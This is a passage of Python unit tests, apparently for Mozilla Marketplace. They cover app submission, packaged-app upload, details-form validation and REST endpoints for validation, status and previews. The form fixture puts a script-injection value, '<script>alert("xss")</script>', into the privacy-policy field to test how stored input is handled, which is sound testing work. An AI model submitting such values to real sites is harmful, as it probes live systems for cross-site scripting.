        rs = self.upload_webapp('http://existing-app.com/my.webapp',
                                expect_errors=True)
        eq_(rs.context['form'].errors,
            {'upload':
             ['An app already exists on this domain; only one '
              'app per domain is allowed.']})

    def test_allow_duplicate_domains(self):
        # Switch off -> duplicate domains are fine.
        self.upload_webapp('http://existing-app.com/my.webapp')  # No errors.

    def test_duplicate_domain_from_js(self):
        self.create_switch(name='webapps-unique-by-domain')
        data = self.post_manifest('http://existing-app.com/my.webapp')
        eq_(data['validation']['errors'], 1)
        eq_(data['validation']['messages'][0]['message'],
            'An app already exists on this domain; '
            'only one app per domain is allowed.')

    def test_allow_duplicate_domains_from_js(self):
        rs = self.post_manifest('http://existing-app.com/my.webapp')
        eq_(rs.status_code, 302)
class BasePackagedAppTest(BaseUploadTest, UploadAddon, amo.tests.TestCase):
    """Base class for packaged-app submission tests: converts the fixture
    app to packaged and prepares a mozball.zip upload."""
    fixtures = fixture('webapp_337141', 'user_999')

    def setUp(self):
        super(BasePackagedAppTest, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.app.update(is_packaged=True)
        self.version = self.app.current_version
        self.file = self.version.all_files[0]
        self.file.update(filename='mozball.zip')
        self.package = self.packaged_app_path('mozball.zip')
        self.upload = self.get_upload(abspath=self.package)
        self.upload.update(name='mozball.zip', is_webapp=True)
        self.url = reverse('submit.app')
        assert self.client.login(username='[email protected]',
                                 password='password')

    def post_addon(self, data=None):
        """POST the upload and return the newly created Addon (the fixture
        app already exists, hence the count of 1)."""
        eq_(Addon.objects.count(), 1)
        self.post(data=data)
        return Addon.objects.order_by('-id')[0]

    def setup_files(self, filename='mozball.zip'):
        # Make sure the source file is there.
        # Original packaged file.
        if not storage.exists(self.file.file_path):
            try:
                # We don't care if these dirs exist.
                os.makedirs(os.path.dirname(self.file.file_path))
            except OSError:
                pass
            shutil.copyfile(self.packaged_app_path(filename),
                            self.file.file_path)
        # Signed packaged file.
        if not storage.exists(self.file.signed_file_path):
            try:
                # We don't care if these dirs exist.
                os.makedirs(os.path.dirname(self.file.signed_file_path))
            except OSError:
                pass
            shutil.copyfile(self.packaged_app_path(filename),
                            self.file.signed_file_path)
class TestCreatePackagedApp(BasePackagedAppTest):
    """Tests for creating an app from an uploaded package (zip)."""

    @mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
    def test_post_app_redirect(self, _mock):
        res = self.post()
        webapp = Webapp.objects.order_by('-created')[0]
        self.assert3xx(res,
                       reverse('submit.app.details', args=[webapp.app_slug]))

    @mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
    @mock.patch('mkt.submit.forms.verify_app_domain')
    def test_app_from_uploaded_package(self, _verify, _mock):
        # Package metadata lands on the Addon; a packaged app has no
        # manifest URL and its domain comes from the package origin.
        addon = self.post_addon(
            data={'packaged': True, 'free_platforms': ['free-firefoxos']})
        eq_(addon.type, amo.ADDON_WEBAPP)
        eq_(addon.current_version.version, '1.0')
        eq_(addon.is_packaged, True)
        assert addon.guid is not None, (
            'Expected app to have a UUID assigned to guid')
        eq_(unicode(addon.name), u'Packaged MozillaBall ょ')
        eq_(addon.slug, 'app-%s' % addon.id)
        eq_(addon.app_slug, u'packaged-mozillaball-ょ')
        eq_(addon.description, u'Exciting Open Web development action!')
        eq_(addon.manifest_url, None)
        eq_(addon.app_domain, 'app://hy.fr')
        eq_(Translation.objects.get(id=addon.description.id, locale='it'),
            u'Azione aperta emozionante di sviluppo di fotoricettore!')
        eq_(addon.current_version.developer_name, 'Mozilla Labs')
        assert _verify.called, (
            '`verify_app_domain` should be called for packaged apps with '
            'origins.')

    @mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
    def test_packaged_app_not_unique(self, _mock):
        # A second packaged app on the same origin is rejected.
        Webapp.objects.create(is_packaged=True, app_domain='app://hy.fr')
        res = self.post(
            data={'packaged': True, 'free_platforms': ['free-firefoxos']},
            expect_errors=True)
        eq_(res.context['form'].errors, {
            'upload': ['An app already exists on this domain; only one app '
                       'per domain is allowed.']})
class TestDetails(TestSubmit):
    """Tests for the "details" step of the app submission flow.

    Covers the basic-info form, category form, icon/preview uploads and
    their validation errors.
    """
    fixtures = fixture('webapp_337141', 'user_999', 'user_10482')
    def setUp(self):
        super(TestDetails, self).setUp()
        self.webapp = self.get_webapp()
        self.webapp.update(status=amo.STATUS_NULL)
        self.url = reverse('submit.app.details', args=[self.webapp.app_slug])
    def get_webapp(self):
        # Fresh fetch of the fixture app (id comes from webapp_337141).
        return Webapp.objects.get(id=337141)
    def upload_preview(self, image_file=None):
        # Upload a screenshot/preview image; returns the upload hash.
        if not image_file:
            image_file = get_image_path('preview.jpg')
        return self._upload_image(self.webapp.get_dev_url('upload_preview'),
                                  image_file=image_file)
    def upload_icon(self, image_file=None):
        # Upload an icon image; returns the upload hash.
        if not image_file:
            image_file = get_image_path('mozilla-sq.png')
        return self._upload_image(self.webapp.get_dev_url('upload_icon'),
                                  image_file=image_file)
    def _upload_image(self, url, image_file):
        # POST the image and return the server-side upload hash that the
        # details form later references.
        with open(image_file, 'rb') as data:
            rp = self.client.post(url, {'upload_image': data})
        eq_(rp.status_code, 200)
        hash_ = json.loads(rp.content)['upload_hash']
        assert hash_, 'No hash: %s' % rp.content
        return hash_
    def _step(self):
        # Complete the prerequisite steps (terms + manifest) and set up
        # ownership, device type and category so the details form can POST.
        self.user.update(read_dev_agreement=datetime.datetime.now())
        self.cl = AppSubmissionChecklist.objects.create(addon=self.webapp,
                                                        terms=True,
                                                        manifest=True)
        # Associate app with user.
        AddonUser.objects.create(addon=self.webapp, user=self.user)
        # Associate device type with app.
        self.dtype = DEVICE_TYPES.values()[0]
        AddonDeviceType.objects.create(addon=self.webapp,
                                       device_type=self.dtype.id)
        self.device_types = [self.dtype]
        # Associate category with app.
        self.cat1 = Category.objects.create(type=amo.ADDON_WEBAPP, name='Fun')
        AddonCategory.objects.create(addon=self.webapp, category=self.cat1)
    def test_anonymous(self):
        self._test_anonymous()
    def test_resume_later(self):
        # Once details are done, "resume" goes to the edit page instead.
        self._step()
        self.webapp.appsubmissionchecklist.update(details=True)
        r = self.client.get(reverse('submit.app.resume',
                                    args=[self.webapp.app_slug]))
        self.assert3xx(r, self.webapp.get_dev_url('edit'))
    def test_not_owner(self):
        self._step()
        assert self.client.login(username='[email protected]',
                                 password='password')
        eq_(self.client.get(self.url).status_code, 403)
    def test_page(self):
        self._step()
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        eq_(pq(r.content)('#submit-details').length, 1)
    def test_progress_display(self):
        self._step()
        self._test_progress_display(['terms', 'manifest'], 'details')
    def new_preview_formset(self, *args, **kw):
        # Build a blank preview form dict from the rendered formset.
        ctx = self.client.get(self.url).context
        blank = initial(ctx['form_previews'].forms[-1])
        blank.update(**kw)
        return blank
    def preview_formset(self, *args, **kw):
        # Assemble formset POST data; None values become empty strings.
        kw.setdefault('initial_count', 0)
        kw.setdefault('prefix', 'files')
        fs = formset(*[a for a in args] + [self.new_preview_formset()], **kw)
        return dict([(k, '' if v is None else v) for k, v in fs.items()])
    def get_dict(self, **kw):
        # Valid POST data for the details form; kwargs override defaults,
        # and keys whose value is None are removed entirely.
        data = {
            'app_slug': 'testname',
            'description': 'desc',
            'privacy_policy': 'XXX <script>alert("xss")</script>',
            'homepage': 'http://www.goodreads.com/user/show/7595895-krupa',
            'support_url': 'http://www.goodreads.com/user_challenges/351558',
            'support_email': '[email protected]',
            'categories': [self.cat1.id],
            'flash': '1',
            'publish': '1'
        }
        # Add the required screenshot.
        data.update(self.preview_formset({
            'upload_hash': '<hash>',
            'position': 0
        }))
        data.update(**kw)
        # Remove fields without values.
        data = dict((k, v) for k, v in data.iteritems() if v is not None)
        return data
    def check_dict(self, data=None, expected=None):
        # Verify the webapp was saved with the expected field values.
        if data is None:
            data = self.get_dict()
        addon = self.get_webapp()
        # Build a dictionary of expected results.
        expected_data = {
            'app_slug': 'testname',
            'description': 'desc',
            'privacy_policy': 'XXX <script>alert("xss")</script>',
            'uses_flash': True,
            'make_public': amo.PUBLIC_IMMEDIATELY
        }
        if expected:
            expected_data.update(expected)
        # NOTE: the loop variable shadows the `expected` parameter, which
        # is no longer needed at this point.
        for field, expected in expected_data.iteritems():
            got = unicode(getattr(addon, field))
            expected = unicode(expected)
            eq_(got, expected,
                'Expected %r for %r. Got %r.' % (expected, field, got))
        self.assertSetEqual(addon.device_types, self.device_types)
    @mock.patch('mkt.submit.views.record_action')
    def test_success(self, record_action):
        self._step()
        data = self.get_dict()
        r = self.client.post(self.url, data)
        self.assertNoFormErrors(r)
        self.check_dict(data=data)
        self.webapp = self.get_webapp()
        self.assert3xx(r, self.get_url('done'))
        eq_(self.webapp.status, amo.STATUS_PENDING)
        assert record_action.called
    @mock.patch('mkt.submit.views.record_action')
    def test_success_iarc(self, record_action):
        """TODO: delete the above test when cleaning up waffle."""
        # With the IARC switch on, the app stays incomplete after details.
        self.create_switch('iarc')
        self._step()
        data = self.get_dict()
        r = self.client.post(self.url, data)
        self.assertNoFormErrors(r)
        self.check_dict(data=data)
        self.webapp = self.get_webapp()
        self.assert3xx(r, self.get_url('done'))
        eq_(self.webapp.status, amo.STATUS_NULL)
        assert record_action.called
    def test_success_paid(self):
        # Premium apps remain incomplete until payment setup is finished.
        self._step()
        self.webapp = self.get_webapp()
        self.make_premium(self.webapp)
        data = self.get_dict()
        r = self.client.post(self.url, data)
        self.assertNoFormErrors(r)
        self.check_dict(data=data)
        self.webapp = self.get_webapp()
        self.assert3xx(r, self.get_url('done'))
        eq_(self.webapp.status, amo.STATUS_NULL)
        eq_(self.webapp.highest_status, amo.STATUS_PENDING)
    def test_success_prefill_device_types_if_empty(self):
        """
        The new submission flow asks for device types at step one.
        This ensures that existing incomplete apps still have device
        compatibility.
        """
        self._step()
        AddonDeviceType.objects.all().delete()
        self.device_types = amo.DEVICE_TYPES.values()
        data = self.get_dict()
        r = self.client.post(self.url, data)
        self.assertNoFormErrors(r)
        self.check_dict(data=data)
        self.webapp = self.get_webapp()
        self.assert3xx(r, self.get_url('done'))
    def test_success_for_public_waiting(self):
        # Omitting 'publish' means the app waits rather than going public.
        self._step()
        data = self.get_dict()
        del data['publish']
        r = self.client.post(self.url, data)
        self.assertNoFormErrors(r)
        self.check_dict(data=data, expected={'make_public': amo.PUBLIC_WAIT})
        self.webapp = self.get_webapp()
        self.assert3xx(r, self.get_url('done'))
    def test_media_types(self):
        self._step()
        res = self.client.get(self.url)
        doc = pq(res.content)
        eq_(doc('.screenshot_upload').attr('data-allowed-types'),
            'image/jpeg|image/png|video/webm')
        eq_(doc('#id_icon_upload').attr('data-allowed-types'),
            'image/jpeg|image/png')
    def test_screenshot(self):
        self._step()
        im_hash = self.upload_preview()
        data = self.get_dict()
        data.update(self.preview_formset({
            'upload_hash': im_hash,
            'position': 0
        }))
        rp = self.client.post(self.url, data)
        eq_(rp.status_code, 302)
        ad = Addon.objects.get(pk=self.webapp.pk)
        eq_(ad.previews.all().count(), 1)
    def test_icon(self):
        # Uploading an icon should produce resized copies for every size.
        self._step()
        im_hash = self.upload_icon()
        data = self.get_dict()
        data['icon_upload_hash'] = im_hash
        data['icon_type'] = 'image/png'
        rp = self.client.post(self.url, data)
        eq_(rp.status_code, 302)
        ad = self.get_webapp()
        eq_(ad.icon_type, 'image/png')
        for size in amo.ADDON_ICON_SIZES:
            fn = '%s-%s.png' % (ad.id, size)
            assert os.path.exists(os.path.join(ad.get_icon_dir(), fn)), (
                'Expected %s in %s' % (fn, os.listdir(ad.get_icon_dir())))
    def test_screenshot_or_video_required(self):
        self._step()
        data = self.get_dict()
        # Blank out every formset upload hash to trigger the error.
        for k in data:
            if k.startswith('files') and k.endswith('upload_hash'):
                data[k] = ''
        rp = self.client.post(self.url, data)
        eq_(rp.context['form_previews'].non_form_errors(),
            ['You must upload at least one screenshot or video.'])
    def test_unsaved_screenshot(self):
        self._step()
        # If there are form errors we should still pass the previews URIs.
        preview_type = 'video/webm'
        preview_uri = 'moz-filedata:p00p'
        data = self.preview_formset({
            'position': 1,
            'upload_hash': '<hash_one>',
            'unsaved_image_type': preview_type,
            'unsaved_image_data': preview_uri
        })
        r = self.client.post(self.url, data)
        eq_(r.status_code, 200)
        form = pq(r.content)('form')
        eq_(form.find('input[name=files-0-unsaved_image_type]').val(),
            preview_type)
        eq_(form.find('input[name=files-0-unsaved_image_data]').val(),
            preview_uri)
    def test_unique_allowed(self):
        # Duplicate app names are allowed for webapps.
        self._step()
        r = self.client.post(self.url, self.get_dict(name=self.webapp.name))
        self.assertNoFormErrors(r)
        app = Webapp.objects.exclude(app_slug=self.webapp.app_slug)[0]
        self.assert3xx(r, reverse('submit.app.done', args=[app.app_slug]))
        eq_(self.get_webapp().status, amo.STATUS_PENDING)
    def test_unique_allowed_iarc(self):
        """TODO: delete the above test when cleaning up waffle."""
        self.create_switch('iarc')
        self._step()
        r = self.client.post(self.url, self.get_dict(name=self.webapp.name))
        self.assertNoFormErrors(r)
        app = Webapp.objects.exclude(app_slug=self.webapp.app_slug)[0]
        self.assert3xx(r, reverse('submit.app.done', args=[app.app_slug]))
        eq_(self.get_webapp().status, amo.STATUS_NULL)
    def test_slug_invalid(self):
        self._step()
        # Submit an invalid slug.
        d = self.get_dict(app_slug='slug!!! aksl23%%')
        r = self.client.post(self.url, d)
        eq_(r.status_code, 200)
        self.assertFormError(r, 'form_basic', 'app_slug',
            "Enter a valid 'slug' consisting of letters, numbers, underscores "
            "or hyphens.")
    def test_slug_required(self):
        self._step()
        r = self.client.post(self.url, self.get_dict(app_slug=''))
        eq_(r.status_code, 200)
        self.assertFormError(r, 'form_basic', 'app_slug',
                             'This field is required.')
    def test_description_required(self):
        self._step()
        r = self.client.post(self.url, self.get_dict(description=''))
        eq_(r.status_code, 200)
        self.assertFormError(r, 'form_basic', 'description',
                             'This field is required.')
    def test_privacy_policy_required(self):
        self._step()
        r = self.client.post(self.url, self.get_dict(privacy_policy=None))
        self.assertFormError(r, 'form_basic', 'privacy_policy',
                             'This field is required.')
    def test_clashing_locale(self):
        # Required translated fields may be satisfied in any locale, not
        # just the current request locale.
        self.webapp.default_locale = 'de'
        self.webapp.save()
        self._step()
        self.client.cookies['current_locale'] = 'en-us'
        data = self.get_dict(name=None, name_de='Test name',
                             privacy_policy=None,
                             **{'privacy_policy_en-us': 'XXX'})
        r = self.client.post(self.url, data)
        self.assertNoFormErrors(r)
    def test_homepage_url_optional(self):
        self._step()
        r = self.client.post(self.url, self.get_dict(homepage=None))
        self.assertNoFormErrors(r)
    def test_homepage_url_invalid(self):
        self._step()
        r = self.client.post(self.url, self.get_dict(homepage='xxx'))
        self.assertFormError(r, 'form_basic', 'homepage', 'Enter a valid URL.')
    def test_support_url_optional(self):
        self._step()
        r = self.client.post(self.url, self.get_dict(support_url=None))
        self.assertNoFormErrors(r)
    def test_support_url_invalid(self):
        self._step()
        r = self.client.post(self.url, self.get_dict(support_url='xxx'))
        self.assertFormError(r, 'form_basic', 'support_url',
                             'Enter a valid URL.')
    def test_support_email_required(self):
        self._step()
        r = self.client.post(self.url, self.get_dict(support_email=None))
        self.assertFormError(r, 'form_basic', 'support_email',
                             'This field is required.')
    def test_support_email_invalid(self):
        self._step()
        r = self.client.post(self.url, self.get_dict(support_email='xxx'))
        self.assertFormError(r, 'form_basic', 'support_email',
                             'Enter a valid email address.')
    def test_categories_required(self):
        self._step()
        r = self.client.post(self.url, self.get_dict(categories=[]))
        eq_(r.context['form_cats'].errors['categories'],
            ['This field is required.'])
    def test_categories_max(self):
        # No more than amo.MAX_CATEGORIES categories may be selected.
        self._step()
        eq_(amo.MAX_CATEGORIES, 2)
        cat2 = Category.objects.create(type=amo.ADDON_WEBAPP, name='bling')
        cat3 = Category.objects.create(type=amo.ADDON_WEBAPP, name='blang')
        cats = [self.cat1.id, cat2.id, cat3.id]
        r = self.client.post(self.url, self.get_dict(categories=cats))
        eq_(r.context['form_cats'].errors['categories'],
            ['You can have only 2 categories.'])
    def _post_cats(self, cats):
        # POST a category selection and assert it was persisted exactly.
        self.client.post(self.url, self.get_dict(categories=cats))
        eq_(sorted(self.get_webapp().categories.values_list('id', flat=True)),
            sorted(cats))
    def test_categories_add(self):
        self._step()
        cat2 = Category.objects.create(type=amo.ADDON_WEBAPP, name='bling')
        self._post_cats([self.cat1.id, cat2.id])
    def test_categories_add_and_remove(self):
        self._step()
        cat2 = Category.objects.create(type=amo.ADDON_WEBAPP, name='bling')
        self._post_cats([cat2.id])
    def test_categories_remove(self):
        # Add another category here so it gets added to the initial formset.
        cat2 = Category.objects.create(type=amo.ADDON_WEBAPP, name='bling')
        AddonCategory.objects.create(addon=self.webapp, category=cat2)
        self._step()
        # `cat2` should get removed.
        self._post_cats([self.cat1.id])
class TestDone(TestSubmit):
    """Tests for the final "done" step of app submission."""
    fixtures = fixture('user_999', 'webapp_337141')
    def setUp(self):
        super(TestDone, self).setUp()
        self.webapp = self.get_webapp()
        self.url = reverse('submit.app.done', args=[self.webapp.app_slug])
    def get_webapp(self):
        return Webapp.objects.get(id=337141)
    def _step(self, **kw):
        # Mark every prior submission step complete and make `self.user`
        # an author of the app; kwargs may override checklist fields.
        data = dict(addon=self.webapp, terms=True, manifest=True,
                    details=True)
        data.update(kw)
        self.cl = AppSubmissionChecklist.objects.create(**data)
        AddonUser.objects.create(addon=self.webapp, user=self.user)
    def test_anonymous(self):
        self._test_anonymous()
    def test_progress_display(self):
        self._step()
        self._test_progress_display(['terms', 'manifest', 'details'], 'done')
    def test_done(self):
        self._step()
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
class TestNextSteps(amo.tests.TestCase):
    """The "done"/next-steps page with the IARC waffle switch enabled."""
    # TODO: Delete this test suite once we deploy IARC.
    fixtures = fixture('user_999', 'webapp_337141')
    def setUp(self):
        self.create_switch('iarc')
        self.user = UserProfile.objects.get(username='regularuser')
        assert self.client.login(username=self.user.email, password='password')
        self.webapp = Webapp.objects.get(id=337141)
        self.webapp.update(status=amo.STATUS_PENDING)
        self.url = reverse('submit.app.done', args=[self.webapp.app_slug])
    def test_200(self, **kw):
        # With all checklist steps done and the user as author, the page
        # should render successfully.
        data = dict(addon=self.webapp, terms=True, manifest=True,
                    details=True)
        data.update(kw)
        self.cl = AppSubmissionChecklist.objects.create(**data)
        AddonUser.objects.create(addon=self.webapp, user=self.user)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
########NEW FILE########
__FILENAME__ = test_views_api
import base64
import os
import json
from nose.tools import eq_, ok_
from mock import patch
from PIL import Image, ImageChops
from django.core.urlresolvers import reverse
import amo.tests
from addons.models import AddonUser
from files.models import FileUpload
from users.models import UserProfile
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
def fake_fetch_manifest(url, upload_pk=None, **kw):
    """Test stand-in for the manifest-fetch task.

    Instead of fetching anything, stamp a fake validation result onto the
    FileUpload identified by `upload_pk`.
    """
    fake_result = json.dumps({'fake_validation': True})
    FileUpload.objects.get(pk=upload_pk).update(validation=fake_result)
class ValidationHandler(RestOAuth):
    """Shared setup and helpers for the app-validation REST API tests."""
    fixtures = fixture('user_2519', 'user_admin')
    def setUp(self):
        super(ValidationHandler, self).setUp()
        self.list_url = reverse('app-validation-list')
        # Populated by create() once a validation resource exists.
        self.get_url = None
        self.user = UserProfile.objects.get(pk=2519)
    def test_has_cors(self):
        self.assertCORS(self.client.get(self.list_url), 'post', 'get')
    @patch('mkt.submit.views.tasks')
    def create(self, tasks_mock, client=None):
        # POST a manifest URL; the fetch task is replaced with a fake that
        # marks the upload as validated. Returns (response, parsed JSON).
        tasks_mock.fetch_manifest.side_effect = fake_fetch_manifest
        manifest_url = u'http://foo.com/'
        if client is None:
            client = self.client
        res = client.post(self.list_url,
                          data=json.dumps({'manifest': manifest_url}))
        data = json.loads(res.content)
        self.get_url = reverse('app-validation-detail',
                               kwargs={'pk': data['id']})
        # The task must have been kicked off with the URL and upload id.
        eq_(tasks_mock.fetch_manifest.call_args[0][0], manifest_url)
        eq_(tasks_mock.fetch_manifest.call_args[0][1], data['id'])
        return res, data
    def get(self):
        return FileUpload.objects.all()[0]
    def get_error(self, response):
        return json.loads(response.content)
class TestAddValidationHandler(ValidationHandler):
    """POST tests for creating a validation from a manifest URL."""
    def test_verbs(self):
        self._allowed_verbs(self.list_url, ['post'])
    def test_good(self):
        res, data = self.create()
        eq_(res.status_code, 201)
        eq_(data['processed'], True)
        # The created FileUpload is attributed to the authenticated user.
        obj = FileUpload.objects.get(uuid=data['id'])
        eq_(obj.user, self.user)
    def test_missing(self):
        res = self.client.post(self.list_url, data=json.dumps({}))
        eq_(res.status_code, 400)
        eq_(self.get_error(res)['manifest'], ['This field is required.'])
    def test_bad(self):
        res = self.client.post(self.list_url,
                               data=json.dumps({'manifest': 'blurgh'}))
        eq_(res.status_code, 400)
        eq_(self.get_error(res)['manifest'], ['Enter a valid URL.'])
    def test_anon(self):
        # Anonymous clients may also submit; the upload has no user.
        res, data = self.create(client=self.anon)
        eq_(res.status_code, 201)
        eq_(data['processed'], True)
        obj = FileUpload.objects.get(uuid=data['id'])
        eq_(obj.user, None)
class TestPackagedValidation(amo.tests.AMOPaths, ValidationHandler):
    """Validation API tests for packaged (zip) app uploads."""
    def setUp(self):
        super(TestPackagedValidation, self).setUp()
        name = 'mozball.zip'
        path = self.packaged_app_path(name)
        # Read the zip in binary mode and close the handle promptly; the
        # original `open(path).read()` leaked the file object and relied
        # on text mode for binary data.
        with open(path, 'rb') as fh:
            self.file = base64.b64encode(fh.read())
        self.data = {'data': self.file, 'name': name,
                     'type': 'application/zip'}
    @patch('mkt.submit.views.tasks')
    def create(self, tasks_mock, client=None):
        # POST the packaged upload; the validator task is mocked out.
        if client is None:
            client = self.client
        res = client.post(self.list_url,
                          data=json.dumps({'upload': self.data}))
        data = json.loads(res.content)
        self.get_url = reverse('app-validation-detail',
                               kwargs={'pk': data['id']})
        # The validator task must be queued for the new upload.
        eq_(tasks_mock.validator.delay.call_args[0][0], data['id'])
        return res
    def test_good(self):
        # Packaged uploads are accepted asynchronously (202, unprocessed).
        res = self.create()
        eq_(res.status_code, 202)
        content = json.loads(res.content)
        eq_(content['processed'], False)
        obj = FileUpload.objects.get(uuid=content['id'])
        eq_(obj.user, self.user)
    @patch('mkt.developers.forms.MAX_PACKAGED_APP_SIZE', 2)
    def test_too_big(self):
        res = self.client.post(self.list_url,
                               data=json.dumps({'upload': self.data}))
        eq_(res.status_code, 400)
        eq_(json.loads(res.content)['upload'][0],
            'Packaged app too large for submission. '
            'Packages must be smaller than 2 bytes.')
    def form_errors(self, data, errors):
        # POST a malformed upload payload and assert the expected errors.
        res = self.client.post(self.list_url,
                               data=json.dumps({'upload': data}))
        eq_(res.status_code, 400)
        eq_(self.get_error(res)['upload'], errors)
    def test_missing(self):
        self.form_errors({'data': self.file, 'name': 'mozball.zip'},
                         [u'Type and data are required.'])
    def test_missing_name(self):
        self.form_errors({'data': self.file, 'type': 'application/zip'},
                         [u'Name not specified.'])
    def test_wrong(self):
        self.form_errors({'data': self.file, 'name': 'mozball.zip',
                          'type': 'application/foo'},
                         [u'Type must be application/zip.'])
    def test_invalid(self):
        self.form_errors({'data': 'x', 'name': 'mozball.zip',
                          'type': 'application/foo'},
                         [u'File must be base64 encoded.'])
class TestGetValidationHandler(ValidationHandler):
    """GET tests for retrieving a validation result."""
    def create(self):
        # Create a FileUpload directly and point get_url at its detail view.
        res = FileUpload.objects.create(user=self.user, path='http://foo.com')
        self.get_url = reverse('app-validation-detail', kwargs={'pk': res.pk})
        return res
    def test_verbs(self):
        self.create()
        self._allowed_verbs(self.get_url, ['get'])
    def test_check(self):
        self.create()
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
    def test_anon(self):
        # Anonymous clients may read validation results too.
        self.create()
        res = self.anon.get(self.get_url)
        eq_(res.status_code, 200)
    def test_not_found(self):
        url = reverse('app-validation-detail', kwargs={'pk': 12121212121212})
        res = self.client.get(url)
        eq_(res.status_code, 404)
    def test_not_run(self):
        # Before validation runs, the resource reports processed=False.
        self.create()
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        eq_(json.loads(res.content)['processed'], False)
    def test_pass(self):
        obj = self.create()
        obj.update(valid=True)
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['processed'], True)
        eq_(data['valid'], True)
    def test_failure(self):
        obj = self.create()
        error = '{"errors": 1, "messages": [{"tier": 1, "message": "nope"}]}'
        obj.update(valid=False, validation=error)
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['processed'], True)
        eq_(data['valid'], False)
class TestAppStatusHandler(RestOAuth, amo.tests.AMOPaths):
    """REST API tests for reading and PATCHing an app's status."""
    fixtures = fixture('user_2519', 'webapp_337141')
    def setUp(self):
        super(TestAppStatusHandler, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        AddonUser.objects.create(addon=self.app, user=self.user)
        self.get_url = reverse('app-status-detail', kwargs={'pk': self.app.pk})
    def get(self, expected_status=200):
        # GET the status resource and return (response, parsed JSON).
        res = self.client.get(self.get_url)
        eq_(res.status_code, expected_status)
        data = json.loads(res.content)
        return res, data
    def test_verbs(self):
        self._allowed_verbs(self.get_url, ['get', 'patch'])
    def test_has_no_cors(self):
        res = self.client.get(self.get_url)
        assert 'access-control-allow-origin' not in res
    def test_status(self):
        # The serialized status string tracks the model status field.
        res, data = self.get()
        eq_(self.app.status, amo.STATUS_PUBLIC)
        eq_(data['status'], 'public')
        eq_(data['disabled_by_user'], False)
        self.app.update(status=amo.STATUS_NULL)
        res, data = self.get()
        eq_(data['status'], 'incomplete')
        eq_(data['disabled_by_user'], False)
        self.app.update(status=amo.STATUS_PENDING)
        res, data = self.get()
        eq_(data['status'], 'pending')
        eq_(data['disabled_by_user'], False)
        self.app.update(disabled_by_user=True)
        res, data = self.get()
        eq_(data['status'], 'pending')
        eq_(data['disabled_by_user'], True)
    def test_status_not_mine(self):
        AddonUser.objects.get(user=self.user).delete()
        res = self.client.get(self.get_url)
        eq_(res.status_code, 403)
    def test_disable(self):
        eq_(self.app.disabled_by_user, False)
        res = self.client.patch(self.get_url,
                                data=json.dumps({'disabled_by_user': True}))
        eq_(res.status_code, 200)
        self.app.reload()
        eq_(self.app.disabled_by_user, True)
        eq_(self.app.status, amo.STATUS_PUBLIC)  # Unchanged, doesn't matter.
    def test_disable_not_mine(self):
        AddonUser.objects.get(user=self.user).delete()
        res = self.client.patch(self.get_url,
                                data=json.dumps({'disabled_by_user': True}))
        eq_(res.status_code, 403)
    def test_change_status_to_pending_fails(self):
        # A public app cannot be moved back to pending via the API.
        res = self.client.patch(self.get_url,
                                data=json.dumps({'status': 'pending'}))
        eq_(res.status_code, 400)
        data = json.loads(res.content)
        ok_('status' in data)
    @patch('mkt.webapps.models.Webapp.is_fully_complete')
    def test_change_status_to_pending(self, is_fully_complete):
        # A complete, incomplete-status app may be moved to pending.
        is_fully_complete.return_value = True
        self.app.update(status=amo.STATUS_NULL)
        res = self.client.patch(self.get_url,
                                data=json.dumps({'status': 'pending'}))
        eq_(res.status_code, 200)
        self.app.reload()
        eq_(self.app.disabled_by_user, False)
        eq_(self.app.status, amo.STATUS_PENDING)
    def test_change_status_to_public_fails(self):
        # Apps cannot jump straight from pending to public.
        self.app.update(status=amo.STATUS_PENDING)
        res = self.client.patch(self.get_url,
                                data=json.dumps({'status': 'public'}))
        eq_(res.status_code, 400)
        data = json.loads(res.content)
        ok_('status' in data)
        eq_(self.app.reload().status, amo.STATUS_PENDING)
    @patch('mkt.webapps.models.Webapp.is_fully_complete')
    def test_incomplete_app(self, is_fully_complete):
        # Incomplete apps get the completion error messages in the 400.
        is_fully_complete.return_value = False
        self.app.update(status=amo.STATUS_NULL)
        res = self.client.patch(self.get_url,
                                data=json.dumps({'status': 'pending'}))
        eq_(res.status_code, 400)
        data = json.loads(res.content)
        self.assertSetEqual(data['status'], self.app.completion_error_msgs())
    @patch('mkt.webapps.models.Webapp.is_fully_complete')
    def test_public_waiting(self, is_fully_complete):
        # A public-waiting app may be flipped to public by its owner.
        is_fully_complete.return_value = True
        self.app.update(status=amo.STATUS_PUBLIC_WAITING)
        res = self.client.patch(self.get_url,
                                data=json.dumps({'status': 'public'}))
        eq_(res.status_code, 200)
        eq_(self.app.reload().status, amo.STATUS_PUBLIC)
class TestPreviewHandler(RestOAuth, amo.tests.AMOPaths):
    """REST API tests for creating, fetching and deleting app previews."""
    fixtures = fixture('user_2519', 'webapp_337141')
    def setUp(self):
        super(TestPreviewHandler, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.user = UserProfile.objects.get(pk=2519)
        AddonUser.objects.create(user=self.user, addon=self.app)
        # Read the image in binary mode and close the handle; the original
        # `open(...).read()` leaked the file object.
        with open(self.preview_image(), 'rb') as fh:
            self.file = base64.b64encode(fh.read())
        self.list_url = reverse('app-preview',
                                kwargs={'pk': self.app.pk})
        self.good = {'file': {'data': self.file, 'type': 'image/jpg'},
                     'position': 1}
    def get_error(self, response):
        return json.loads(response.content)
    def test_has_cors(self):
        self.assertCORS(self.client.post(self.list_url),
                        'post', 'delete', 'get')
    def test_post_preview(self):
        res = self.client.post(self.list_url, data=json.dumps(self.good))
        eq_(res.status_code, 201)
        previews = self.app.previews
        eq_(previews.count(), 1)
        eq_(previews.all()[0].position, 1)
    def test_wrong_url(self):
        # A non-numeric pk in the URL yields a 404, not a server error.
        self.list_url = reverse('app-preview',
                                kwargs={'pk': 'booyah'})
        res = self.client.post(self.list_url, data=json.dumps(self.good))
        eq_(res.status_code, 404)
        data = json.loads(res.content)
